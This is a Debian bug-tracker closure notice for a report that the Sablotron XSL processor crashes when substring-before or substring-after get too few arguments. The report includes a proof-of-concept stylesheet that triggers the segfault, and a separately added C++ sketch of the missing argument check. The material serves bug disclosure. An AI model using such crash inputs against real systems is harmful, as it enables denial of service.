Your message dated Mon, 30 Dec 2013 10:03:47 +0200
with message-id <20131230080347.GA1688@sid.nuvreauspam>
and subject line Re: Bug#733457: Security bug in Sablotron XSL processor
has caused the Debian Bug report #733457,
regarding Security bug in Sablotron XSL processor
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
733457: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=733457
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: sablotron
Version: 1.0.3-1
Severity: Critical
Sablotron uses unmapped memory to parse argument objects. If an attacker
can map this area of memory, they may be able to cause the application to
act in an unintended way. I did not research the possibility of code
execution.
In https://github.com/lindes/sablotron/blob/master/src/engine/expr.cpp,
starting on line 3094, the code fails to check the presence of arguments in
the substring-before and substring-after functions.
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b79316 in Expression::tostring(Situation&, Str&) ()
from /home/daybreak/sablorelease/src/engine/.libs/libsablot.so.0
PoC is attached.
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" $
  <xsl:template match="/">
    <xsl:call-template name="urlResolver">
      <xsl:with-param name="input" select="hello" />
    </xsl:call-template>
  </xsl:template>
  <xsl:template name="urlResolver">
    <xsl:param name="input" />
    <xsl:variable name="testVar" select="substring-before('CRASH')"/>
  </xsl:template>
</xsl:stylesheet>
--- End Message ---
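The argument-count check the report says is missing, sketched as an added example; it is not part of the original messages and is not Sablotron's code. The names `kArity`, `arityOk` and `callStringFn` are hypothetical, and arguments are assumed to be already converted to strings. XPath 1.0 defines both substring-before and substring-after as taking exactly two string arguments.

```cpp
// Added illustration, not Sablotron source. All identifiers are hypothetical.
#include <cstddef>
#include <iostream>
#include <map>
#include <string>
#include <vector>

// Required argument counts (min, max) for the two functions named in the report.
struct Arity { std::size_t min, max; };
static const std::map<std::string, Arity> kArity = {
    {"substring-before", {2, 2}},
    {"substring-after",  {2, 2}},
};

// True only when fn is known and argc is within its declared range.
bool arityOk(const std::string& fn, std::size_t argc) {
    std::map<std::string, Arity>::const_iterator it = kArity.find(fn);
    return it != kArity.end() && argc >= it->second.min && argc <= it->second.max;
}

// Evaluates the call into `out`. Returning false stands for "report a
// stylesheet error to the caller"; no argument is touched on that path.
bool callStringFn(const std::string& fn,
                  const std::vector<std::string>& args, std::string& out) {
    if (!arityOk(fn, args.size()))
        return false;                     // validate before indexing args
    const std::string& s = args[0];       // safe: exactly two arguments present
    const std::string& sep = args[1];
    const std::size_t pos = s.find(sep);
    if (pos == std::string::npos)
        out.clear();                      // XPath: empty string when sep is absent
    else if (fn == "substring-before")
        out = s.substr(0, pos);
    else
        out = s.substr(pos + sep.size());
    return true;
}

int main() {
    std::string out;
    // Same call shape as the PoC: one argument where two are required.
    std::vector<std::string> poc(1, "CRASH");
    std::cout << (callStringFn("substring-before", poc, out)
                      ? "evaluated" : "rejected: wrong argument count") << "\n";
    return 0;
}
```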
--- Begin Message ---
On Sat, 28 Dec 13, 18:21:20, johnvillamil2010 . wrote:
> Package: sablotron
> Version: 1.0.3-1
This package is not in Debian, please report this bug to where you
obtained the package from.
Thanks,
Andrei
--
http://wiki.debian.org/FAQsFromDebianUser
Offtopic discussions among Debian users and developers:
http://lists.alioth.debian.org/mailman/listinfo/d-community-offtopic
http://nuvreauspam.ro/gpg-transition.txt
--- End Message ---